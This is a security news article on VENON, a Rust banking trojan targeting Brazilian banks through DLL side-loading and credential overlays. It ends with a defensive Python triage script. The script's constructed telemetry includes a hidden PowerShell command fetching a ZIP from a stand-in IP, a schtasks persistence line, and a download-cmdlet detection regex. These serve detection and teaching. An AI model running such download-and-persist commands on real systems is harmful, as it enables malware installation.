Rust-Based VENON Malware Targets 33 Brazilian Banks with Credential-Stealing Overlays
#Cybersecurity


Security Reporter

Cybersecurity researchers have discovered VENON, a sophisticated Rust-based banking trojan targeting Brazilian financial institutions through DLL side-loading and social engineering, marking a shift from traditional Delphi-based malware in Latin America.

Cybersecurity researchers have uncovered a sophisticated new banking malware targeting Brazilian users that represents a significant evolution in Latin American cybercrime. The malware, dubbed VENON by Brazilian cybersecurity company ZenoX, is written in Rust—a departure from the Delphi-based malware families that have dominated the region's threat landscape.

A New Breed of Banking Trojan

VENON exhibits behaviors consistent with established banking trojans like Grandoreiro, Mekotio, and Coyote, particularly in its banking overlay logic, active window monitoring, and shortcut hijacking mechanisms. However, its Rust foundation suggests a more technically sophisticated developer, possibly leveraging generative AI to translate and expand upon existing Latin American banking trojan capabilities.

"The Rust code structure presents patterns suggesting a developer familiar with the capabilities of existing Latin American banking trojans, but who used generative AI to rewrite and expand these functionalities in Rust," ZenoX researchers noted. The malware's development environment revealed references to a Windows machine username "byst4," though the campaign hasn't been attributed to any previously documented group.

Sophisticated Infection Chain

The malware is delivered through DLL side-loading: a legitimate, signed executable is made to load the malicious DLL from its own directory, so the first process on the host looks like trusted software. Researchers suspect the campaign uses social engineering tactics such as ClickFix to talk users into running a PowerShell command that downloads ZIP archives containing the executable and the DLL.

Once loaded, the DLL runs through nine evasion techniques before it takes any malicious action. Among them:

  • Anti-sandbox checks
  • Indirect syscalls
  • ETW (Event Tracing for Windows) bypass
  • AMSI (Antimalware Scan Interface) bypass

The malware then retrieves its configuration from Google Cloud Storage, establishes persistence by installing a scheduled task, and opens a WebSocket connection to its command-and-control server.

Targeted Attack Vectors

Two Visual Basic Script blocks implement a shortcut hijacking mechanism that targets only the Itaú banking application. The component replaces the legitimate shortcut with a tampered version that sends the victim to an attacker-controlled web page instead. Notably, it also carries an uninstall routine that restores the original shortcut, which suggests the operator can remotely clean up to cover their tracks.

VENON's configuration covers 33 financial institutions and digital asset platforms. It monitors window titles and the domain of the active browser tab, and only when a targeted application or site is in the foreground does it display a fake overlay to harvest credentials.

Broader Context: WhatsApp-Based Campaigns

The VENON discovery comes amid related campaigns exploiting WhatsApp's ubiquity in Brazil. Threat actors are distributing a worm named SORVEPOTEL through WhatsApp's desktop web version, abusing already-authenticated sessions to send malicious lures from the victim's own account.

"A single WhatsApp message delivered through a hijacked SORVEPOTEL session was sufficient to draw a victim into a multi-stage chain that ultimately resulted in an Astaroth implant running fully in memory," said Blackpoint Cyber researchers. These campaigns combine local automation tooling, unsupervised browser drivers, and user-writable runtimes to establish malware with minimal friction.

Technical Sophistication and Implications

The use of Rust for banking malware represents a notable shift in the Latin American cybercrime ecosystem. Rust's appeal to malware developers has less to do with memory safety than with detection and analysis: Rust-compiled binaries look nothing like the Delphi families that regional defenders have spent years fingerprinting, so existing signatures, unpacking scripts and analyst heuristics built for those families do not carry over, and Rust's large, statically linked binaries with a heavily inlined standard library slow down manual reverse engineering.

The malware's architecture combines several features that together explain its effectiveness:

  • DLL side-loading for initial execution
  • Multiple evasion techniques to bypass security controls
  • WebSocket-based C2 communication for real-time control
  • Configurable targeting of 33 financial institutions
  • Shortcut hijacking with remote cleanup capabilities

This development suggests that Latin American cybercrime groups are evolving their technical capabilities, potentially influenced by global malware trends while maintaining their focus on regional financial targets.

Protection and Detection

Organizations and individuals in Brazil should be particularly vigilant about:

  • Unexpected ZIP downloads, especially ones initiated by PowerShell right after a user pasted a command they were told to run (the ClickFix pattern)
  • PowerShell invocations that use download cmdlets, hidden windows or encoded commands
  • Signed executables running from user-writable directories (Temp, AppData, Downloads) and loading unsigned DLLs from the same folder, the shape of DLL side-loading
  • Desktop shortcuts (.lnk files) whose target or arguments have changed, particularly for banking applications
  • Scheduled tasks created by a user process and pointing at binaries in user-writable directories
  • Outbound WebSocket upgrades to hosts that are not known, sanctioned services
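The checks above, and the shortcut-hijacking behaviour described earlier, can be turned into a small triage script. The following is an added example written for this article; it is not code from ZenoX, from the malware, or from any product. It runs over constructed telemetry in the shape of Sysmon process-create (event 1) and image-load (event 7) records, a proxy log line, and resolved .lnk records. The allowlist, the shortcut baseline, every path and the 203.0.113.7 address are all assumptions made up for illustration; the page does not give the real Itaú shortcut target or any VENON infrastructure.

```python
"""Triage constructed endpoint telemetry for the VENON indicators the article
lists: PowerShell ZIP downloads, DLL side-loading from user-writable folders,
scheduled-task persistence, WebSocket connections to unknown hosts and tampered
banking shortcuts.  Added example, not code from ZenoX or from the malware;
every record, path, host and baseline value below is constructed."""
import re
from pathlib import PureWindowsPath

# Directories a standard user can write to.  A process running from one of
# these and loading an unsigned DLL that sits beside its own EXE is the
# classic side-loading shape.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

# Constructed allowlist of hosts the organisation expects WebSocket traffic to.
WS_ALLOWLIST = {"collab.example.internal"}

# Assumed defender baseline of what banking shortcuts should point at.  The
# real Itaú shortcut target is not given on the page; this is a placeholder.
SHORTCUT_BASELINE = {
    "C:\\Users\\alice\\Desktop\\Itau.lnk": "C:\\Program Files\\Bank\\bank.exe",
}

DOWNLOAD_CMDLETS = re.compile(r"invoke-webrequest|iwr|downloadfile|downloadstring|start-bitstransfer")


def in_user_writable(path: str) -> bool:
    return any(seg in path.lower() for seg in USER_WRITABLE)


def check_process(ev: dict):
    """Sysmon event 1 (process create): PowerShell fetching a ZIP, or schtasks
    creating a task whose action lives in a user-writable directory."""
    image = PureWindowsPath(ev["Image"]).name.lower()
    cmd = ev.get("CommandLine", "").lower()
    if image in ("powershell.exe", "pwsh.exe") and DOWNLOAD_CMDLETS.search(cmd) and ".zip" in cmd:
        return "powershell_zip_download"
    if image == "schtasks.exe" and "/create" in cmd and in_user_writable(cmd):
        return "schtask_runs_from_user_dir"
    return None


def check_image_load(ev: dict):
    """Sysmon event 7 (image load): an EXE in a user-writable folder loading an
    unsigned DLL from its own directory.  'Signed' describes the loaded DLL."""
    exe, dll = PureWindowsPath(ev["Image"]), PureWindowsPath(ev["ImageLoaded"])
    if (dll.suffix.lower() == ".dll" and exe.parent == dll.parent
            and in_user_writable(str(exe)) and ev.get("Signed", "true").lower() == "false"):
        return "dll_sideload_candidate"
    return None


def check_http(ev: dict):
    """Proxy/HTTP record: WebSocket upgrade to a host not on the allowlist."""
    if ev.get("upgrade", "").lower() == "websocket" and ev["host"] not in WS_ALLOWLIST:
        return "websocket_to_unknown_host"
    return None


def check_shortcut(lnk: dict):
    """Resolved .lnk record {path, target, arguments} compared with the baseline.
    PureWindowsPath equality is case-insensitive, as Windows paths are."""
    expected = SHORTCUT_BASELINE.get(lnk["path"])
    if expected and PureWindowsPath(lnk["target"]) != PureWindowsPath(expected):
        return "banking_shortcut_hijacked"
    return None


CHECKS = {"process": check_process, "imageload": check_image_load,
          "http": check_http, "shortcut": check_shortcut}


def triage(records):
    """Return (rule, record id) pairs for every record that matches a check."""
    hits = []
    for rec in records:
        rule = CHECKS[rec["kind"]](rec)
        if rule:
            hits.append((rule, rec["id"]))
    return hits


# Constructed telemetry, roughly in the order of operations the article describes.
SAMPLE = [
    {"kind": "process", "id": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iwr http://203.0.113.7/update.zip -OutFile $env:TEMP\\update.zip\""},
    {"kind": "imageload", "id": 2, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\legit.exe",
     "ImageLoaded": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\version.dll", "Signed": "false"},
    {"kind": "imageload", "id": 3, "Image": "C:\\Program Files\\Vendor\\app.exe",
     "ImageLoaded": "C:\\Program Files\\Vendor\\helper.dll", "Signed": "true"},
    {"kind": "process", "id": 4, "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": "schtasks /create /sc onlogon /tn Updater /tr C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\legit.exe"},
    {"kind": "http", "id": 5, "host": "203.0.113.7", "upgrade": "websocket"},
    {"kind": "http", "id": 6, "host": "collab.example.internal", "upgrade": "websocket"},
    {"kind": "shortcut", "id": 7, "path": "C:\\Users\\alice\\Desktop\\Itau.lnk",
     "target": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "arguments": "http://203.0.113.7/itau"},
]

if __name__ == "__main__":
    for rule, rid in triage(SAMPLE):
        print(f"record {rid}: {rule}")
```

Records 3 and 6 are the benign controls: a signed DLL loaded from Program Files and a WebSocket to an allowlisted host produce no hit, which is the point of anchoring the side-loading rule on a user-writable parent directory and the WebSocket rule on an allowlist rather than on the protocol alone. On a real estate the .lnk records would come from resolving shortcuts with the Shell COM API, and the baseline should be the target the bank's installer actually writes.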

Security teams should update their threat intelligence feeds to include VENON's characteristics and implement detection rules for its evasion techniques and communication patterns.

The emergence of VENON underscores the ongoing evolution of banking malware and the need for continuous adaptation in cybersecurity defenses, particularly in regions with high mobile and messaging platform usage rates.
